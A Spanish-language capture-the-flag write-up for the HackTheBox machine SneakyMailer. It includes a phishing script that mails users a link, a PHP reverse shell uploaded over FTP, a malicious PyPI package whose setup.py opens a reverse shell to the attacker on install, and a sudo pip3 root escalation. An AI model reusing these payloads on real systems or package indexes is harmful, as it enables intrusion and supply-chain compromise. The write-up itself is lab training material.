# SneakyMailer

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen

- Enum SMTP email's
- Phishing Attack
- IMAP Connect (Evolution)
- FTP Reverse Shell
- Pypi reverse shell module
- Pip Priv Esc (sudo)

## Nmap Scan

`nmap -Pn -p- -sV -sC 10.10.10.197`

```
Nmap scan report for 10.10.10.197
Host is up (0.058s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: ENABLE UIDPLUS ACL IMAP4rev1 CHILDREN SORT THREAD=REFERENCES IDLE NAMESPACE OK completed THREAD=ORDEREDSUBJECT CAPABILITY QUOTA STARTTLS UTF8=ACCEPTA0001 ACL2=UNION
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: ENABLE UIDPLUS ACL IMAP4rev1 CHILDREN SORT THREAD=REFERENCES IDLE NAMESPACE OK AUTH=PLAIN THREAD=ORDEREDSUBJECT CAPABILITY QUOTA completed UTF8=ACCEPTA0001 ACL2=UNION
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

El nmap scan en el puerto 80 nos arroja un nombre de dominio **sneakycorp.htb**, lo agregaremos a nuestro **/etc/hosts**.

##### /etc/hosts
```
10.10.10.197    sneakycorp.htb
```

Al acceder a la página podemos ver varias direcciones de correo electrónico.

![1](img/1.png)

El puerto 8080 solo nos muestra la página por default del servidor Nginx.

![2](img/2.png)

Enumerando directorios en los 2 puertos no se encontró nada que nos pudiera ayudar a conseguir algo importante.

Utilizando **wfuzz** enumeramos subdominios en el puerto 80 y 8080.

```
wfuzz -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u "http://sneakycorp.htb" -H "Host: FUZZ.sneakycorp.htb" -t 40 --hc 301,400
```

![3](img/3.png)

```
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://sneakycorp.htb:8080" -H "Host: FUZZ.sneakycorp.htb" -t 40 --hw 69 --hc 400
```

![4](img/4.png)

Podemos ver que nos regresa un par de subdominios, los escribiremos en nuestro archivo **hosts** como lo hicimos anteriormente.

```
10.10.10.197    sneakycorp.htb pypi.sneakycorp.htb dev.sneakycorp.htb
```

Visualizando **dev.sneakycorp.htb** pareciera que es la misma página en la cual no podemos hacer nada.

![5](img/5.png)

En el dominio **pypi.sneakycorp.htb** nos muestra que hay un servidor pypi corriendo el cual nos pide credenciales para interactuar con él.

![6](img/6.png)

### Phishing Attack

Recordando que contamos con una lista de email's nos ayudaremos del puerto 25 que corre el servicio SMTP para validar los correos.

`ismtp -h 10.10.10.197 -t 20 -e email.txt -l 2`

![7](img/7.png)

Se nos listan varios correos válidos lo cuales usaremos para hacer un simple **Phishing Attack**. Pondremos a la escucha nuestro **netcat** en el puerto 80 y mandaremos un correo a todas las cuentas con un enlace a nuestro servidor y cuando algún usuario de clic en nuestro enlace veremos la respuesta en el nc.

Para automatizar este proceso crearemos un script.

##### phishing.py
```python
import os

archivo = open("validusers.txt", 'r')

for users in archivo.readlines():
    email = users[:-1]
    os.system(
        "sendemail -t " + email + " -f " + email + " -s sneakymailer.htb -u subject -m '<a href=\"http://10.10.14.114/\">DOOM</a>' -o tls=no"
    )
    print email

archivo.close()
```

- `sudo nc -lvnp 80`
- `python phishing.py`

![8](img/8.png)

Nos arroja el password del usuario **paulbyrd@sneakymailer.htb** en URL encode.

```
paulbyrd: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
```

### IMAP Connect (Evolution)

Utilizando la herramienta **evolution** accederemos a los correos de la cuenta obtenida.

![9](img/9.png)

![10](img/10.png)

![11](img/11.png)

![12](img/12.png)

![13](img/13.png)

Podemos ver que en un correo vienen credenciales del usuario **developer** que utilizaremos para conectarnos al puerto 21 que correo el servicio FTP.

![14](img/14.png)

### FTP Reverse Shell

Nos conectamos al FTP.

```
developer: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
```

`ftp 10.10.10.197`

![15](img/15.png)

Podemos ver que hay un directorio llamado dev y si recordamos hay un subdominio llamado **dev.sneakymailer.htb**, haciendo pruebas, tenemos permisos de escritura en ese directorio y se puede visualizar el contenido en el subdominio mencionado.

Subiremos un archivo al FTP con nuestra reverse shell y accederemos a él por medio de la página web.

- `cp /usr/share/webshells/php/php-reverse-shell.php .`
- `nc -lvnp 1234`
- `put php-reverse-shell.php`
- `curl http://dev.sneakycorp.htb/php-reverse-shell.php`

![16](img/16.png)

## Escalada de Privilegios (User)

Enumerando los directorios nos encontramos con un hash en **/var/www/pypi.sneakycorp.htb/.htpasswd**.

![17](img/17.png)

Usando **john** podemos romper el hash y conseguir el password en texto plano.

`sudo john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt`

![18](img/18.png)

### Pypi reverse shell module

Ahora podemos acceder al subdominio **pypi.sneakymailer.htb** en el puerto 8080 con las credenciales obtenidas.

```
pypi: soufianeelhaoui
```

![19](img/19.png)

No muestra nada importante. Continuando enumerando nos encontramos que el usuario **low** está ejecutando un script llamado **install-modules.py** el cual no podemos ver pero, ya que tenemos acceso al servidor pypi es posible crear un paquete de python he instalarlo, de esa forma conseguiremos un shell como **low**.

![20](img/20.png)

Creamos nuestro python package, es necesario poner un nc a la escucha, ya que ejecutara la reverse shell, cuando se conecte solo le daremos exit y seguirá el proceso de empaquetado:

- `mkdir -p package/doom`
- `touch package/doom/__init__.py`
- `nano package/setup.py`
- `nc -lvnp 4321`
- `python setup.py sdist`

##### setup.py
```python
import os, socket, subprocess
from setuptools import setup

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.114",4321))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)                                                                                        
p=subprocess.call(["/bin/sh","-i"])                                                                          
                                                                                                             
setup(name='doom',                                                                                           
      version='0.1',
      description='Doom reverse shell',
      author='Doom',                                                                                         
      author_email='Doom@slayer.com',                                                                        
      license='MIT',                                                                                         
      packages=['doom'],                                                                                     
      zip_safe=False)
```

![21](img/21.png)

Ahora subiremos nuestro package al servidor para que lo instale. Para eso utilizaremos **twine**.

- `nc -lvnp 4321`
- `twine upload --repository-url http://pypi.sneakycorp.htb:8080/ dist/doom-0.1.tar.gz -u pypi -p soufianeelhaoui`

![22](img/22.png)

## Escalada de Privilegios (Root)

Podemos ver que tenemos permisos sudo para ejecutar pip3.

`sudo -l`

![23](img/23.png)

Utilizando [GTFOBins](https://gtfobins.github.io/gtfobins/pip/) podemos tomar ventaja de eso y obtener shell como root.

- `TF=$(mktemp -d)`
- `echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py`
- `sudo /usr/bin/pip3 install $TF`

![24](img/24.png)

## Referencias
https://pypi.org/project/pypiserver/ \
https://python-packaging.readthedocs.io/en/latest/minimal.html \
https://gtfobins.github.io/gtfobins/pip/